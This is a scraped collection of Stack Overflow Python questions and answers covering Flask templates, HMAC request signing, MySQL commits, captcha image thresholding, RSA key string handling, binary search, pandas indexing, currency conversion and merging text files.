[ "You have several misunderstandings here. You can't use the name of a variable as a string. What you need is a dictionary, where both key and value are strings. Next, you were using ...).lower, but without the parentheses, so the result was the lower function object, not the result of calling the function.\nThis does what you want:\nimport random\n\nelements = {\n \"astatine\": \"Rarest naturally occurring element in the Earth crust\",\n \"bromine\": \"Naturally occurring element that is a liquid at room temperature besides Mercury\",\n \"bismuth\": \"Most naturally diamagnetic element\",\n \"radon\": \"Densest noble gases\",\n \"tungsten\": \"Has the highest melting point of all metals\",\n \"radium\": \"Heaviest alkaline earth metal\",\n \"caesium\": \"Most reactive metal\",\n \"neodymium\": \"Strongest permanent magnet\",\n \"fermium\": \"Heaviest element that can be formed by neutron bombardment of lighter elements\",\n \"oganesson\": \"Highest atomic number of all known elements\"\n}\n\n\ninput('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.')\n#Randomise the list\nwhile True:\n elem = random.choice(list(elements))\n print(elem)\n print('↓↓↓\\n' , '>>> ' , elements[elem] , ' <<<')\n ans = input('Type your answer here → ').lower()\n\n #check if the answer is same as the element\n if ans == elem:\n selection = input('Correct. Press 1 to play again. Press Any key to exit program')\n else:\n selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.')\n if selection == \"1\":\n continue\n print('thanks')\n break\n\n" ]
[ 0 ]
[]
[]
[ "if_statement", "python" ]
stackoverflow_0074592947_if_statement_python.txt
Q: flask template rendering weird Looking at this, it should work right? It seems like the get request is overwriting the post request return because it only renders no error. Why is that? index.html {% if error %} <p>{{ error }}</p> {% else %} <p>no error</p> {% endif %} main.py @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') return render_template('index.html') edit: still haven't found out what's wrong. A: Look closely at post_data['message']. Are you absolutely sure it's False? If it's the string 'False', the code falls through and won't render an error. A: Try using else or elif. else: @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') else: return render_template('index.html') elif (recommended): @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') elif request.method == 'GET': return render_template('index.html')
flask template rendering weird
Looking at this, it should work right? It seems like the get request is overwriting the post request return because it only renders no error. Why is that? index.html {% if error %} <p>{{ error }}</p> {% else %} <p>no error</p> {% endif %} main.py @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') return render_template('index.html') edit: still haven't found out what's wrong.
[ "Look closely at post_data['message']. Are you absolutely sure it's False? If it's the string 'False', the code falls through and won't render an error.\n", "Try using else or elif.\nelse:\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n post_data = request.get_json(force=True)\n if post_data['message'] == False:\n return render_template('index.html', error='not detected')\n else:\n return render_template('index.html')\n\nelif (recommended):\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n post_data = request.get_json(force=True)\n if post_data['message'] == False:\n return render_template('index.html', error='not detected')\n elif request.method == 'GET':\n return render_template('index.html')\n\n" ]
[ 0, 0 ]
[]
[]
[ "flask", "post", "python" ]
stackoverflow_0074587480_flask_post_python.txt
Q: Need help to create signature in python I have sample code from golang, here is some sample values to run the code: app_secret = 777, path = /api/orders, app_key = 12345, timestamp = 1623812664 or you guys can refer this link to get more info https://developers.tiktok-shops.com/documents/document/234136#3.Signature%20Algorithm import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "sort" ) func generateSHA256(path string, queries map[string]string, secret string) string{ keys := make([]string, len(queries)) idx := 0 for k, _ := range queries{ keys[idx] = k idx++ } sort.Slice(keys, func(i, j int) bool { return keys[i] < keys[j] }) input := path for _, key := range keys{ input = input + key + queries[key] } input = secret + input + secret h := hmac.New(sha256.New, []byte(secret)) if _, err := h.Write([]byte(input)); err != nil{ // todo: log error return "" } return hex.EncodeToString(h.Sum(nil)) } need help converting this golang sample into python sample i have tried but keep getting signature invalid when submit my python code import hmac import hashlib def _short_sign(self, app_key, app_secret, path, timestamp): base_string = "%sapp_key%stimestamp%s"%(path, app_key, timestamp) sign_string = app_secret + base_string + app_secret sign = hmac.new(app_secret.encode(), sign_string.encode(), hashlib.sha256).hexdigest() return sign A: Found the issue, i was trying to digest with out digestmod Working Example: sign = hmac.new( app_secret.encode(), sign_string.encode(), digestmod = hashlib.sha256 ).hexdigest()
Need help to create signature in python
I have sample code from golang, here is some sample values to run the code: app_secret = 777, path = /api/orders, app_key = 12345, timestamp = 1623812664 or you guys can refer this link to get more info https://developers.tiktok-shops.com/documents/document/234136#3.Signature%20Algorithm import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "sort" ) func generateSHA256(path string, queries map[string]string, secret string) string{ keys := make([]string, len(queries)) idx := 0 for k, _ := range queries{ keys[idx] = k idx++ } sort.Slice(keys, func(i, j int) bool { return keys[i] < keys[j] }) input := path for _, key := range keys{ input = input + key + queries[key] } input = secret + input + secret h := hmac.New(sha256.New, []byte(secret)) if _, err := h.Write([]byte(input)); err != nil{ // todo: log error return "" } return hex.EncodeToString(h.Sum(nil)) } need help converting this golang sample into python sample i have tried but keep getting signature invalid when submit my python code import hmac import hashlib def _short_sign(self, app_key, app_secret, path, timestamp): base_string = "%sapp_key%stimestamp%s"%(path, app_key, timestamp) sign_string = app_secret + base_string + app_secret sign = hmac.new(app_secret.encode(), sign_string.encode(), hashlib.sha256).hexdigest() return sign
[ "Found the issue, i was trying to digest with out digestmod\nWorking Example:\n sign = hmac.new(\n app_secret.encode(),\n sign_string.encode(),\n digestmod = hashlib.sha256\n ).hexdigest()\n\n" ]
[ 0 ]
[]
[]
[ "hash", "python", "python_3.x", "sign" ]
stackoverflow_0074592357_hash_python_python_3.x_sign.txt
Q: how to UPDATE SQL database dynamically using python? import mysql.connector db = mysql.connector.connect(host="localhost", user="1234", passwd="1234", database="books1") mycursor = db.cursor() label = '202' position = 'A1' sql2 = """INSERT INTO info (label, position) VALUES (%s, %s)""" db2 = (label, position) mycursor.execute(sql2, db2) print("Updated") When I run code it says updated but whenever I checked and refresh my sql database the old table appears. How do I update here my latest input data? A: You have to commit the transaction. Add db.commit() after mycursor.execute()
how to UPDATE SQL database dynamically using python?
import mysql.connector db = mysql.connector.connect(host="localhost", user="1234", passwd="1234", database="books1") mycursor = db.cursor() label = '202' position = 'A1' sql2 = """INSERT INTO info (label, position) VALUES (%s, %s)""" db2 = (label, position) mycursor.execute(sql2, db2) print("Updated") When I run code it says updated but whenever I checked and refresh my sql database the old table appears. How do I update here my latest input data?
[ "You have to commit the transaction.\nAdd db.commit() after mycursor.execute()\n" ]
[ 2 ]
[]
[]
[ "python", "sql" ]
stackoverflow_0074592976_python_sql.txt
Q: how to get captcha numbers separately using python I have this specific 3-digit of captcha, like: I am trying to slice the 3 digits, I tried to use pytesseract module to recognize text in images but it's not so accurate. so I researched about it and fount out that I could make the background completely white so that I could crop all the extra space from the picture and dividing the picture to 3 pieces would most likely happens to be what I need, so I'm looking for a way to implement this filter and crop it and slicing it into three pieces I found out PIL module can help me import the image on python from PIL import Image im = Image.open("captcha.jpg") and I'm looking for a way which I can make the background totally white and crop the extra spaces and divide the picture into three pieces, thanks for your guidance in advance. A: so I have found this library called cv2 with this method called threshold For every pixel, the same threshold value is applied. If the pixel value is smaller than the threshold, it is set to 0, otherwise it is set to a maximum value. img = cv.imread('gradient.png',0) ret,thresh1 = cv.threshold(img,127,255,cv.THRESH_BINARY) in the example above it takes an image and if the pixel is below 127 it makes it completely white, otherwise it's going to be completely black. further reading: https://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html
how to get captcha numbers separately using python
I have this specific 3-digit of captcha, like: I am trying to slice the 3 digits, I tried to use pytesseract module to recognize text in images but it's not so accurate. so I researched about it and fount out that I could make the background completely white so that I could crop all the extra space from the picture and dividing the picture to 3 pieces would most likely happens to be what I need, so I'm looking for a way to implement this filter and crop it and slicing it into three pieces I found out PIL module can help me import the image on python from PIL import Image im = Image.open("captcha.jpg") and I'm looking for a way which I can make the background totally white and crop the extra spaces and divide the picture into three pieces, thanks for your guidance in advance.
[ "so I have found this library called cv2 with this method called threshold\nFor every pixel, the same threshold value is applied. If the pixel value is smaller than the threshold, it is set to 0, otherwise it is set to a maximum value.\nimg = cv.imread('gradient.png',0)\nret,thresh1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\n\nin the example above it takes an image and if the pixel is below 127 it makes it completely white, otherwise it's going to be completely black.\nfurther reading:\nhttps://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html\n" ]
[ 0 ]
[]
[]
[ "captcha", "python", "text_recognition" ]
stackoverflow_0074592679_captcha_python_text_recognition.txt
Q: How to take out the quotation marks(start & end) and convert into bytes - Python 3.7.9 I'm receiving from an input this, "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" and i'm struggling to make it become a bytes, and not string, and be able to load the keys without problems - ValueError: No PEM start marker "b'-----BEGIN RSA PUBLIC KEY-----'" found. Changing to bytes using the b'', tried replacing it, tried using the strip(). etc A: Python 3.9+ : You have .removesuffix() and .removeprefix() options. In lower versions, You can simply slice the string from character two, until before the last one. Then you can use .encode() to convert your string to byte: old_string = "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" new_string1 = old_string.removeprefix("b'").removesuffix("'").encode("ASCII") new_string2 = old_string[2:-1].encode("ASCII") print(type(old_string), old_string) print(type(new_string1), new_string1) print(type(new_string2), new_string2) output: <class 'str'> b'-----BEGIN RSA PUBLIC KEY-----\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\n-----END RSA PUBLIC KEY-----\n' <class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n' <class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n' By default .encode() uses "UTF-8" but since your dealing with ASCII characters it won't cause problem. You can pass "ASCII" if you want.
How to take out the quotation marks(start & end) and convert into bytes - Python 3.7.9
I'm receiving from an input this, "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" and i'm struggling to make it become a bytes, and not string, and be able to load the keys without problems - ValueError: No PEM start marker "b'-----BEGIN RSA PUBLIC KEY-----'" found. Changing to bytes using the b'', tried replacing it, tried using the strip(). etc
[ "Python 3.9+ : You have .removesuffix() and .removeprefix() options.\nIn lower versions, You can simply slice the string from character two, until before the last one.\nThen you can use .encode() to convert your string to byte:\nold_string = \"b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\"\nnew_string1 = old_string.removeprefix(\"b'\").removesuffix(\"'\").encode(\"ASCII\")\nnew_string2 = old_string[2:-1].encode(\"ASCII\")\n\nprint(type(old_string), old_string)\nprint(type(new_string1), new_string1)\nprint(type(new_string2), new_string2)\n\noutput:\n<class 'str'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'\n<class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\n<class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\n\nBy default .encode() uses \"UTF-8\" but since your dealing with ASCII characters it won't cause problem. You can pass \"ASCII\" if you want.\n" ]
[ 1 ]
[]
[]
[ "python", "python_3.7" ]
stackoverflow_0074593012_python_python_3.7.txt
Q: I am trying to implement binary search but i dont know whats wrong with my code? This is binary search algorithm that is showing output as None. I dont know why. And if you know any free course to learn data sctrucures and algorithm in python please let me know . import random def binary_search(list,target): start_index=0 end_index=len(list)-1 while start_index<=end_index: midpoint=(start_index+end_index)//2 midpoint_value=list[midpoint] if midpoint_value==target: return midpoint+1 elif midpoint_value<target: end_index=midpoint-1 else: start_index=midpoint+1 print(binary_search([1,2,3,4,5,6,7,8],8)) 8 on 7th index position A: You're using < wrong. It should be > def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return midpoint+1 elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8)) More appropriate approach will be to return True/False to compare later def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return True elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 return False print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8)) Binary Search reference. G4G is a great resource for learning. A: Refer Below links to learn Python Program for Binary Search w3resource javatpoint geeksforgeeks def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return True elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 return False print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))
I am trying to implement binary search but i dont know whats wrong with my code?
This is binary search algorithm that is showing output as None. I dont know why. And if you know any free course to learn data sctrucures and algorithm in python please let me know . import random def binary_search(list,target): start_index=0 end_index=len(list)-1 while start_index<=end_index: midpoint=(start_index+end_index)//2 midpoint_value=list[midpoint] if midpoint_value==target: return midpoint+1 elif midpoint_value<target: end_index=midpoint-1 else: start_index=midpoint+1 print(binary_search([1,2,3,4,5,6,7,8],8)) 8 on 7th index position
[ "You're using < wrong. It should be >\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return midpoint+1\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\n\nMore appropriate approach will be to return True/False to compare later\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return True\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n return False\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\nBinary Search reference.\nG4G is a great resource for learning.\n", "Refer Below links to learn Python Program for Binary Search\nw3resource javatpoint geeksforgeeks\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return True\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n return False\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\n" ]
[ 0, 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592392_python.txt
Q: How to choose one smallest values among multiple duplicates values in a data frame? Sample Data: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Sample Code 1 WATT1 = WATTx.loc[WATTx['Fitness Value'].eq(df['Fitness Value'].min())] WATT1 Sample Code 2 WATTy = WATTx .loc[WATTx ['Fitness Value'].idxmin()] WATTy Output: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Since all values are the same. In the output, it prints all the values. That's the issue. I want to print one smallest value among these duplicate values. Is it possible? #Screenshot 1 #Screenshot 2 Full Error Track --------------------------------------------------------------------------- ValueError Traceback (most recent call last) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:391, in RangeIndex.get_loc(self, key, method, tolerance) 390 try: --> 391 return self._range.index(new_key) 392 except ValueError as err: ValueError: 13 is not in range The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) Input In [59], in <cell line: 1>() ----> 1 WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] 2 display (WATTy) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1073, in _LocationIndexer.__getitem__(self, key) 1070 axis = self.axis or 0 1072 maybe_callable = com.apply_if_callable(key, self.obj) -> 1073 return self._getitem_axis(maybe_callable, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1312, in _LocIndexer._getitem_axis(self, key, axis) 1310 # fall thru to straight lookup 1311 self._validate_key(key, axis) -> 1312 return self._get_label(key, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1260, in _LocIndexer._get_label(self, label, axis) 1258 def _get_label(self, label, axis: int): 1259 # GH#5567 this will fail if the label is not present in the axis. -> 1260 return self.obj.xs(label, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/generic.py:4056, in NDFrame.xs(self, key, axis, level, drop_level) 4054 new_index = index[loc] 4055 else: -> 4056 loc = index.get_loc(key) 4058 if isinstance(loc, np.ndarray): 4059 if loc.dtype == np.bool_: File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:393, in RangeIndex.get_loc(self, key, method, tolerance) 391 return self._range.index(new_key) 392 except ValueError as err: --> 393 raise KeyError(key) from err 394 self._check_indexing_error(key) 395 raise KeyError(key) KeyError: 13 A: I suppose that your dataframe WATTx has a non unique index values. Try to reset_index before using boolean indexing with idxmin : WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] # Output : print(WATTy) idx 1 Fitness Value 1.045426 MSU Locations {13,38,15} MSU Range 2.213424 Name: 1, dtype: object
How to choose one smallest values among multiple duplicates values in a data frame?
Sample Data: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Sample Code 1 WATT1 = WATTx.loc[WATTx['Fitness Value'].eq(df['Fitness Value'].min())] WATT1 Sample Code 2 WATTy = WATTx .loc[WATTx ['Fitness Value'].idxmin()] WATTy Output: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Since all values are the same. In the output, it prints all the values. That's the issue. I want to print one smallest value among these duplicate values. Is it possible? #Screenshot 1 #Screenshot 2 Full Error Track --------------------------------------------------------------------------- ValueError Traceback (most recent call last) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:391, in RangeIndex.get_loc(self, key, method, tolerance) 390 try: --> 391 return self._range.index(new_key) 392 except ValueError as err: ValueError: 13 is not in range The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) Input In [59], in <cell line: 1>() ----> 1 WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] 2 display (WATTy) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1073, in _LocationIndexer.__getitem__(self, key) 1070 axis = self.axis or 0 1072 maybe_callable = com.apply_if_callable(key, self.obj) -> 1073 return self._getitem_axis(maybe_callable, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1312, in _LocIndexer._getitem_axis(self, key, axis) 1310 # fall thru to straight lookup 1311 self._validate_key(key, axis) -> 1312 return self._get_label(key, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1260, in _LocIndexer._get_label(self, label, axis) 1258 def _get_label(self, label, axis: int): 1259 # GH#5567 this will fail if the label is not present in the axis. -> 1260 return self.obj.xs(label, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/generic.py:4056, in NDFrame.xs(self, key, axis, level, drop_level) 4054 new_index = index[loc] 4055 else: -> 4056 loc = index.get_loc(key) 4058 if isinstance(loc, np.ndarray): 4059 if loc.dtype == np.bool_: File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:393, in RangeIndex.get_loc(self, key, method, tolerance) 391 return self._range.index(new_key) 392 except ValueError as err: --> 393 raise KeyError(key) from err 394 self._check_indexing_error(key) 395 raise KeyError(key) KeyError: 13
[ "I suppose that your dataframe WATTx has a non unique index values.\nTry to reset_index before using boolean indexing with idxmin :\nWATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()]\n\n# Output :\nprint(WATTy)\n\nidx 1\nFitness Value 1.045426\nMSU Locations {13,38,15}\nMSU Range 2.213424\nName: 1, dtype: object\n\n" ]
[ 1 ]
[]
[]
[ "dataframe", "genetic_algorithm", "genetic_programming", "pandas", "python" ]
stackoverflow_0074592779_dataframe_genetic_algorithm_genetic_programming_pandas_python.txt
Q: How to convert prices in one dataframe with exchange rates in another one? I have a dataframe of amount bought like this: import pandas as pd amounts = pd.DataFrame({ 'symbol': ['EUR/USD', 'EUR/USD', 'GBP/USD', 'GBP/USD', 'EUR/GBP', 'EUR/GBP'], 'time': [1, 2, 1, 2, 1, 2], 'amount': [1, 1, 2, 2, 3, 3] }) amounts.set_index('symbol', inplace=True) prices = pd.DataFrame({ 'symbol': ['EUR/USD', 'GBP/USD', 'EUR/GBP'], 'price': [1.2, 1.5, 0.8] }) prices.set_index('symbol', inplace=True) amounts = amounts.join(prices, on='symbol') amounts['eur'] = 0 amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[0] == 'EUR', amounts['amount'] / amounts['price']) amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[1] == 'EUR', amounts['amount'] * amounts['price']) amounts['eur'] = amounts['eur'].mask( (amounts['eur'] == 0) & (f'EUR/' + amounts.index.str.split('/').str[1]).isin(prices.index), amounts['amount'] * amounts['price'] * prices[f'EUR/' + amounts.index.str.split('/').str[1]]) The final output should be amounts['eur'] = [ 0.83, # amount / price(EUR/USD) = 1 / 1.2 0.83, # amount / price(EUR/USD) = 1 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 3.75, # amount / price(EUR/GBP) = 3 / 0.8 3.75 # amount / price(EUR/GBP) = 3 / 0.8 ] Everytime I try to have EUR as the denominator. The last line raise an error unfortunately. I would like to get the amount in EUr denomination. Also, as I have millions of lines, I would like to avoid foor loops. Any idea please? A: Here is one way to do it with Pandas merge method: # Setup amounts = amounts.set_index("symbol") # Convert all prices in EUR prices["price_eur"] = prices["price"] prices.loc[prices["symbol"] == "GBP/USD", "price_eur"] = ( prices.loc[prices["symbol"] == "EUR/USD", "price"].values[0] / prices.loc[prices["symbol"] == "GBP/USD", "price"].values[0] ) prices = prices.set_index("symbol") # Add new column "eur" amounts = ( pd.merge(right=amounts, left=prices, how="right", right_index=True, left_index=True) .pipe(lambda df_: df_.assign(eur=df_["amount"] / df_["price_eur"])) .drop(columns="price_eur") ) Then: price time amount eur symbol EUR/GBP 0.8 1 3 3.750000 EUR/GBP 0.8 2 3 3.750000 EUR/USD 1.2 1 1 0.833333 EUR/USD 1.2 2 1 0.833333 GBP/USD 1.5 1 2 2.500000 GBP/USD 1.5 2 2 2.500000
How to convert prices in one dataframe with exchange rates in another one?
I have a dataframe of amount bought like this: import pandas as pd amounts = pd.DataFrame({ 'symbol': ['EUR/USD', 'EUR/USD', 'GBP/USD', 'GBP/USD', 'EUR/GBP', 'EUR/GBP'], 'time': [1, 2, 1, 2, 1, 2], 'amount': [1, 1, 2, 2, 3, 3] }) amounts.set_index('symbol', inplace=True) prices = pd.DataFrame({ 'symbol': ['EUR/USD', 'GBP/USD', 'EUR/GBP'], 'price': [1.2, 1.5, 0.8] }) prices.set_index('symbol', inplace=True) amounts = amounts.join(prices, on='symbol') amounts['eur'] = 0 amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[0] == 'EUR', amounts['amount'] / amounts['price']) amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[1] == 'EUR', amounts['amount'] * amounts['price']) amounts['eur'] = amounts['eur'].mask( (amounts['eur'] == 0) & (f'EUR/' + amounts.index.str.split('/').str[1]).isin(prices.index), amounts['amount'] * amounts['price'] * prices[f'EUR/' + amounts.index.str.split('/').str[1]]) The final output should be amounts['eur'] = [ 0.83, # amount / price(EUR/USD) = 1 / 1.2 0.83, # amount / price(EUR/USD) = 1 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 3.75, # amount / price(EUR/GBP) = 3 / 0.8 3.75 # amount / price(EUR/GBP) = 3 / 0.8 ] Everytime I try to have EUR as the denominator. The last line raise an error unfortunately. I would like to get the amount in EUr denomination. Also, as I have millions of lines, I would like to avoid foor loops. Any idea please?
[ "Here is one way to do it with Pandas merge method:\n# Setup\namounts = amounts.set_index(\"symbol\")\n\n# Convert all prices in EUR\nprices[\"price_eur\"] = prices[\"price\"]\nprices.loc[prices[\"symbol\"] == \"GBP/USD\", \"price_eur\"] = (\n prices.loc[prices[\"symbol\"] == \"EUR/USD\", \"price\"].values[0]\n / prices.loc[prices[\"symbol\"] == \"GBP/USD\", \"price\"].values[0]\n)\nprices = prices.set_index(\"symbol\")\n\n# Add new column \"eur\"\namounts = (\n pd.merge(right=amounts, left=prices, how=\"right\", right_index=True, left_index=True)\n .pipe(lambda df_: df_.assign(eur=df_[\"amount\"] / df_[\"price_eur\"]))\n .drop(columns=\"price_eur\")\n)\n\nThen:\n price time amount eur\nsymbol\nEUR/GBP 0.8 1 3 3.750000\nEUR/GBP 0.8 2 3 3.750000\nEUR/USD 1.2 1 1 0.833333\nEUR/USD 1.2 2 1 0.833333\nGBP/USD 1.5 1 2 2.500000\nGBP/USD 1.5 2 2 2.500000\n\n" ]
[ 0 ]
[]
[]
[ "pandas", "python", "python_3.x" ]
stackoverflow_0074538466_pandas_python_python_3.x.txt
Q: Python - Combine text data from group of file by filename I have below list of text files , I wanted to combine group of files like below Inv030001.txt - should have all data of files starting with Inv030001 Inv030002.txt - should have all data of files starting with Inv030002 I tried below code but it's not working filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split('\\')[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] prev_invoice_number = current_invoice_number with open(textfile_dir + current_invoice_number+'.txt', 'w') as outfile: for eachfile in fnmatch.filter(os.listdir(textfile_dir), '*[!'+current_invoice_number+'].txt'): current_invoice_number = (eachfile.split('_')[0]).split('.')[0] if(current_invoice_number == prev_invoice_number): with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number else: with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number #break; A: Does this answer your question? My version will append the data from "like" invoice numbers to a .txt file named with just the invoice number. In other words, anything that starts with "Inv030001" will have it's contents appended to "Inv030001.txt". The idea being that you likely don't want to overwrite files and possibly destroy them if your write logic had a mistake. I actually recreated your files to test this. I did exactly what I suggested you do. I just treated every part as a separate task and built it up to this, and in doing that the script became far less verbose and convoluted. I labeled all of my comments with task to pound it in that this is just a series of very simple things. I also renamed your vars to what they actually are. For instance, filenames aren't filenames, at all. They are entire paths. import os from glob import glob #you'll have to change this path to yours root = os.path.join(os.getcwd(), 'texts/') #sorting this may be redundant paths = sorted(glob(root+'*.txt')) for path in paths: #task: get filename filename = path.split('\\')[-1] #task: get invoice number invnum = filename.split('_')[0] #task: open in and out files with open(f'{root}{invnum}.txt', 'a') as out_, open(path, 'r') as in_: #task: append in contents to out out_.write(in_.read()) A: Your code may have had a little too much complications in it. And so, the idea is that for every file in the directory, just add it's contents (that is, append) to the invoice file. from glob import glob, fnmatch import os textfile_dir="invs" + os.sep # # I changed this to os.sep since I'm on a MAC - hopefully works in windows, too filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split(os.sep)[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] with open(textfile_dir + current_invoice_number+'.txt', 'a') as outfile: with open(fname) as infile: for line in infile: outfile.write(line) Some room for improvement: If you created your accumulation files in a different directory, there would be less of a chance of you picking them up when you run this program again (we are using append 'a' when we open the files for writing. The order of the files is not preserved with glob (AFAIK). This may not be great for having deterministic results. A: Below is the working code, if someone is looking for same solution filenames = glob(textfile_dir+'*.txt') dd = defaultdict(list) for filename in filenames: name, ext = os.path.splitext(filename) name = name.split('\\')[-1].split('_')[0] dd[name].append(filename) for key, fnames in dd.items(): with open(textfile_dir+key+'.txt', "w") as newfile: for line in fileinput.FileInput(fnames): 